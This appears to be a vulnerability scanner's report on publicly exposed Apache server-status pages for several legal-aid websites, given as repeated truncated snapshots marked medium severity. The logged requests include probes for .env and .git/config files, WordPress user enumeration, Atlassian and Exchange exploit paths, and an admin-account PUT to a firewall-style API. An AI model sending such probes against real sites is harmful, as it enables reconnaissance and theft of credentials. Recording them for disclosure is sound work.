/s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 18-174-0/0/167704. 1.011500.00.008119.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160828. 1.762700.00.007650.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-17457780/15/157306_ 1.76114210.00.267150.43 15.158.41.176http/1.1atlantalegalaid.org:8080GET /cockle1539598.html HTTP/1.1 21-17459340/3/143051_ 0.304011370.00.046692.12 70.132.4.89http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-174-0/0/139148. 0.551300.00.006503.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-17459360/4/134089_ 0.63151250.00.075996.66 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 24-17457890/8/125119_ 1.594212760.00.275571.85 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 25-174-0/0/63381. 2.402200.00.002734.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-17459370/2/53154_ 0.474045010.00.092385.21 70.132.4.89http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 27-174-0/0/43975. 0.562100.00.001967.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-17459710/3/47731_ 0.633740590.00.151944.41 70.132.4.89http/1.1events.alas.org:8080GET /config.json HTTP/1.1 29-17459720/7/39777W 0.14000.00.011647.16 70.132.4.89http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 30-17459730/7/47629_ 0.114214330.00.011922.45 70.132.4.89http/1.1survey.alas.org:8080GET /about HTTP/1.1 31-174-0/0/37580. 0.533000.00.001619.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-17459790/3/40388_ 0.2025300.00.041800.72 15.158.41.176http/1.1atlantalegalaid.org:8080POST /intake/index.php?url=https%3A%2F%2Fraw.githubusercontent. 33-17459800/8/39273_ 0.014200.00.011871.77 70.132.4.89http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 34-17459810/7/40343_ 0.114214450.00.011779.20 70.132.4.89http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 35-17459865/21/40523K 0.39006.10.081744.29 15.158.41.176http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 36-174-0/0/38803. 0.524200.00.001846.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-17459880/6/40087_ 1.6235690.00.041877.62 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 38-17459890/3/42932_ 0.533739910.00.001662.38 70.132.4.89http/1.1events.alas.org:8080GET /about HTTP/1.1 39-174-0/0/38800. 0.532500.00.001703.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-17459910/7/38381_ 0.094213970.00.011652.88 70.132.4.89http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 41-174-0/0/7661. 0.011400.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-17460290/4/5131_ 1.19413010.00.03195.43 130.176.29.77http/1.1events.alas.org:8080GET /robots.txt HTTP/1.1 43-174-0/0/5416. 0.383300.00.00197.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-17460511/2/3178K 0.61470.90.09167.96 64.252.143.86http/1.1secure.alas.org:8080HEAD / HTTP/1.1 45-17460521/2/3250K 0.620041.90.13168.65 15.158.41.176http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 46-17460530/4/2818_ 0.6636530.00.0078.27 130.176.29.99http/1.1intranet.alas.org:8080GET /robots.txt HTTP/1.1 47-17460540/3/2639_ 0.55500.00.00109.37 130.176.29.99http/1.1survey.atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 48-17460553/4/2687K 0.61004.10.0993.41 70.132.4.89http/1.1picturingjustice.org:8080GET / HTTP/1.1 49-174-0/0/2213. 0.203500.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-17460570/6/2082_ 0.084012600.00.0294.61 70.132.4.89http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 51-17460580/3/2151_ 0.6242550.00.0189.16 15.158.41.176http/1.1events.atlantalegalaid.org:8080POST /wp-cron.php?doing_wp_cron=1671148922.91263008117675781250 52-174-0/0/2667. 0.184000.00.0089.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2062. 0.16500.00.0067.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-17460610/5/2112_ 0.774262810.00.1089.76 70.132.4.157http/1.1events.alas.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9792d960e2f
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:01:03 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 17 minutes 22 seconds Server load: 0.04 0.03 0.00 Total accesses: 5116627 - Total Traffic: 242.0 GB CPU Usage: u43.08 s4.3 cu0 cs0 - .000478% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 28 requests currently being processed, 0 idle workers KKKKKKKWKKKKKKKKKKKKKKKKK....K.......K.K........................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114202725/6/315811K 0.00006.30.1315274.52 130.176.208.180http/1.1picturingjustice.org:8080GET /info.php HTTP/1.1 1-114200041/17/307275K 1.02401.30.5315603.82 130.176.208.138http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-114202774/5/296194K 0.00004.90.2414399.43 130.176.208.180http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 3-114202784/5/291716K 0.00005.40.0114074.46 130.176.208.180http/1.1picturingjustice.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 4-114202878/9/280064K 0.00009.90.0214108.08 130.176.208.180http/1.1picturingjustice.org:8080GET /login.action HTTP/1.1 5-114202887/8/270947K 0.00009.00.0913303.77 130.176.208.180http/1.1picturingjustice.org:8080GET /config.json HTTP/1.1 6-114202937/8/257841K 0.00008.70.0112980.14 130.176.208.180http/1.1picturingjustice.org:8080GET /v2/_catalog HTTP/1.1 7-114203475/5/249537W 0.00006.30.0112283.02 130.176.208.180http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 8-114203523/3/236966K 0.00007.30.0111522.02 130.176.208.180http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 9-114203533/3/226034K 0.00003.90.0011118.76 130.176.208.180http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-114200191/15/214598K 1.740431.51.3410231.68 15.158.47.68http/1.1events.atlantalegalaid.org:8080GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1 11-114203632/2/192014K 0.00002.20.009331.32 130.176.208.148http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 12-114203642/2/176704K 0.00002.30.008770.56 130.176.208.180http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-114203692/2/168044K 0.00012.60.008058.75 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 14-114203742/2/156061K 0.660135.10.037530.89 15.158.47.114http/1.1events.atlantalegalaid.org:8080GET /wp-includes/css/dist/block-library/style.min.css HTTP/1.1 15-114203842/2/149533K 0.000024.70.027254.39 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/helpme-custom-posts/css/events.min.css 16-114203852/2/134160K 0.000018.70.026324.80 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/helpme-custom-posts/css/fancy-title.min 17-114196105/66/112396K 7.15006.01.655336.07 130.176.208.180http/1.1picturingjustice.org:8080GET /s/31332e33322e39392e3731/_/;/META-INF/maven/com.atlassian. 18-114203902/2/103346K 0.000012.70.015128.79 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/dhvc-form/assets/fonts/font-awesome/css 19-114199136/41/93807K 2.63007.82.484748.57 130.176.137.155http/1.1picturingjustice.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 20-114203911/1/93895K 0.00001.40.004523.82 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/helpme-custom-posts/css/image-slideshow 21-114204005/5/86187K 0.010549.30.054051.42 64.252.74.146http/1.1events.atlantalegalaid.org:8080GET /wp-content/themes/helpme/styles/css/helpme-styles.min.css 22-114204011/1/84813K 0.00015.50.014104.66 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/themes/helpme/styles/css/font-awesome.min.css H 23-114204061/1/79164K 0.0101044.00.043708.91 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/js_composer/assets/css/js_composer.min. 24-114204111/1/71764K 0.00015.40.013443.05 64.252.75.130http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/LayerSlider/assets/static/layerslider/c 25-114-0/0/38018. 0.0051000.00.001723.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-114-0/0/30098. 0.0050900.00.001388.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-114-0/0/27627. 0.0050700.00.001253.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-114-0/0/25398. 0.0050800.00.001161.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-114200924/18/23703K 1.320647.10.421034.25 64.252.75.49http/1.1events.atlantalegalaid.org:8080GET /wp-content/plugins/LayerSlider/assets/static/layerslider/j 30-114-0/0/25337. 0.0050600.00.001138.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-114-0/0/23296. 0.0050500.00.001016.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/24119. 0.0050400.00.001138.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/23752. 0.0050300.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114-0/0/24926. 0.0050200.00.001086.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-114-0/0/26401. 0.0050100.00.001148.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-114-0/0/22938. 0.0050000.00.001008.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-114201329/33/23491K 1.930015.21.921057.31 130.176.208.180http/1.1picturingjustice.org:8080GET /about HTTP/1.1 38-114-0/0/23012. 0.0049900.00.001015.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-114201384/17/22428K 1.55008.10.43936.86 130.176.208.180http/1.1picturingjustice.org:8080GET /.DS_Store HTTP/1.1 40-114-0/0/23681. 0.0049800.00.00997.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-114-0/0/4955. 0.00476900.00.00210.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2819. 0.00476800.00.00108.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114-0/0/3161. 0.00476700.00.00137.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-114-0/0/1981. 0.00476600.00.00129.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-114-0/0/1924. 0.00476500.00.0095.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-114-0/0/1810. 0.00476400.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114-0/0/1933. 0.00476300.00.0084.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-114-0/0/1560. 0.00476200.00.0052.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1456. 0.00476100.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1286. 0.00476000.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1480. 0.00475900.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114-0/0/1865
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979f1a2abc6
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:01:00 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 17 minutes 19 seconds Server load: 0.05 0.03 0.00 Total accesses: 5116558 - Total Traffic: 242.0 GB CPU Usage: u45.39 s4.53 cu0 cs0 - .000504% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 14 requests currently being processed, 0 idle workers KKKKKKKK..K......K.K.........K.......K.W........................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114202722/3/315808K 0.00002.10.1215274.51 130.176.208.180http/1.1picturingjustice.org:8080GET /about HTTP/1.1 1-114200041/17/307275K 1.02101.30.5315603.82 130.176.208.138http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-114202772/3/296192K 0.00012.70.2314399.43 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-114202782/3/291714K 0.00003.10.0114074.46 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-114202874/5/280060K 0.00005.10.0214108.08 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-114202884/5/270944K 0.00005.10.0813303.77 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-114202934/5/257838K 0.00005.20.0112980.14 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-114203472/2/249534K 0.00012.60.0012283.02 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-114-0/0/236963. 0.001100.00.0011522.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-114-0/0/226031. 1.99100.00.0011118.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-114200191/14/214597K 1.73241005.61.3110231.65 64.252.66.97http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Legitimation-Answer-and-counter 11-114-0/0/192012. 0.001000.00.009331.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-114-0/0/176702. 0.00900.00.008770.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-114-0/0/168042. 0.00800.00.008058.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-114-0/0/156059. 0.00700.00.007530.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-114-0/0/149531. 1.26000.00.007254.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-114-0/0/134158. 0.00500.00.006324.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-114196102/63/112393K 7.15002.71.655336.07 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 18-114-0/0/103344. 0.00600.00.005128.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114199131/36/93802K 2.62101.52.474748.56 130.176.137.155http/1.1picturingjustice.org:8080GET / HTTP/1.1 20-114-0/0/93894. 0.00400.00.004523.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114-0/0/86182. 0.00300.00.004051.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-114-0/0/84812. 0.0050900.00.004104.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-114-0/0/79163. 0.0048200.00.003708.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114-0/0/71763. 0.0050800.00.003443.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-114-0/0/38018. 0.0050700.00.001723.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-114-0/0/30098. 0.0050600.00.001388.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-114-0/0/27627. 0.0050400.00.001253.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-114-0/0/25398. 0.0050500.00.001161.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-114200921/14/23699K 1.3132632.20.381034.21 15.158.50.39http/1.1atlantalegalaid.org:8080GET /wp-sitemap.xml HTTP/1.1 30-114-0/0/25337. 0.0050300.00.001138.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-114-0/0/23296. 0.0050200.00.001016.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/24119. 0.0050100.00.001138.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/23752. 0.0050000.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114-0/0/24926. 0.0049900.00.001086.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-114-0/0/26401. 0.0049800.00.001148.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-114-0/0/22938. 0.0049700.00.001008.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-114201325/29/23487K 1.93006.71.911057.30 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 38-114-0/0/23012. 0.0049600.00.001015.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-114201381/14/22425W 1.55001.10.43936.85 130.176.208.180http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 40-114-0/0/23681. 0.0049500.00.00997.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-114-0/0/4955. 0.00476600.00.00210.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2819. 0.00476500.00.00108.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114-0/0/3161. 0.00476400.00.00137.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-114-0/0/1981. 0.00476300.00.00129.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-114-0/0/1924. 0.00476200.00.0095.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-114-0/0/1810. 0.00476100.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114-0/0/1933. 0.00476000.00.0084.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-114-0/0/1560. 0.00475900.00.0052.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1456. 0.00475800.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1286. 0.00475700.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1480. 0.00475600.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114-0/0/1865. 0.00475500.00.0051.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-114-0/0/1207. 0.00475400.00.0043.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-113-0/0/1384. 0.006361500.00.0062.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-113-0/0/1097. 0.006361200.00.0051.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-113-0/0/1478. 0.516355200.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979cada1a0f
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:01:02 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 17 minutes 21 seconds Server load: 0.04 0.03 0.00 Total accesses: 5116586 - Total Traffic: 242.0 GB CPU Usage: u43.56 s4.38 cu0 cs0 - .000484% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 19 requests currently being processed, 9 idle workers KKKKKKKKKKKKKKW__K_K_____...._.......W.K........................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114202724/5/315810K 0.00005.30.1215274.52 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-114200041/17/307275K 1.02301.30.5315603.82 130.176.208.138http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-114202774/5/296194K 0.00004.90.2414399.43 130.176.208.180http/1.1picturingjustice.org:8080GET /telescope/requests HTTP/1.1 3-114202784/5/291716K 0.00005.40.0114074.46 130.176.208.180http/1.1picturingjustice.org:8080PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 4-114202877/8/280063K 0.00008.80.0214108.08 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-114202886/7/270946K 0.00008.00.0913303.77 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-114202936/7/257840K 0.00007.60.0112980.14 130.176.208.180http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-114203474/4/249536K 0.00005.20.0112283.02 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-114203521/1/236964K 0.00215.10.0011522.02 130.176.208.180http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 9-114203531/1/226032K 0.00211.50.0011118.76 130.176.208.180http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-114200191/14/214597K 1.73441005.61.3110231.65 64.252.66.97http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Legitimation-Answer-and-counter 11-114203632/2/192014K 0.00002.20.009331.32 130.176.208.148http/1.1picturingjustice.org:8080GET /.env HTTP/1.1 12-114203641/1/176703K 0.00101.10.008770.56 130.176.208.180http/1.1picturingjustice.org:8080GET /s/31332e33322e39392e3932/_/;/META-INF/maven/com.atlassian. 13-114203691/1/168043K 0.00101.10.008058.74 130.176.208.180http/1.1picturingjustice.org:8080GET /.git/config HTTP/1.1 14-114203740/0/156059W 0.00100.00.007530.86 15.158.47.114http/1.1events.atlantalegalaid.org:8080GET / HTTP/1.1 15-114203840/0/149531_ 1.26000.00.007254.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-114203850/0/134158_ 0.00000.00.006324.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-114196104/65/112395K 7.15204.91.655336.07 130.176.208.180http/1.1picturingjustice.org:8080GET /api/search?folderIds=0 HTTP/1.1 18-114203900/0/103344_ 0.00000.00.005128.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114199132/37/93803K 2.63103.42.474748.56 130.176.137.155http/1.1picturingjustice.org:8080GET / HTTP/1.1 20-114203910/0/93894_ 0.00000.00.004523.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114204000/0/86182_ 0.00000.00.004051.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-114204010/0/84812_ 0.00000.00.004104.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-114204060/0/79163_ 0.00000.00.003708.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114204110/0/71763_ 0.00000.00.003443.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-114-0/0/38018. 0.0050900.00.001723.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-114-0/0/30098. 0.0050800.00.001388.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-114-0/0/27627. 0.0050600.00.001253.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-114-0/0/25398. 0.0050700.00.001161.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-114200920/14/23699_ 1.3102630.00.381034.21 15.158.50.39http/1.1atlantalegalaid.org:8080GET /wp-sitemap.xml HTTP/1.1 30-114-0/0/25337. 0.0050500.00.001138.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-114-0/0/23296. 0.0050400.00.001016.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/24119. 0.0050300.00.001138.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/23752. 0.0050200.00.001123.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114-0/0/24926. 0.0050100.00.001086.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-114-0/0/26401. 0.0050000.00.001148.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-114-0/0/22938. 0.0049900.00.001008.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-114201327/31/23489W 1.93009.01.911057.30 130.176.208.180http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 38-114-0/0/23012. 0.0049800.00.001015.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-114201383/16/22427K 1.55207.10.43936.86 130.176.208.180http/1.1picturingjustice.org:8080GET /about HTTP/1.1 40-114-0/0/23681. 0.0049700.00.00997.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-114-0/0/4955. 0.00476800.00.00210.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2819. 0.00476700.00.00108.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114-0/0/3161. 0.00476600.00.00137.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-114-0/0/1981. 0.00476500.00.00129.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-114-0/0/1924. 0.00476400.00.0095.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-114-0/0/1810. 0.00476300.00.0048.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-114-0/0/1933. 0.00476200.00.0084.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-114-0/0/1560. 0.00476100.00.0052.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-114-0/0/1456. 0.00476000.00.0055.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-114-0/0/1286. 0.00475900.00.0057.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-114-0/0/1480. 0.00475800.00.0057.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-114-0/0/1865. 0.00475700.00.0051.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-114-0/0/1207. 0.00475600.00.0043.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-113-0/0/1384. 0.006361800.00.0062.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-113-0/0/1097.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979fc4f7d51
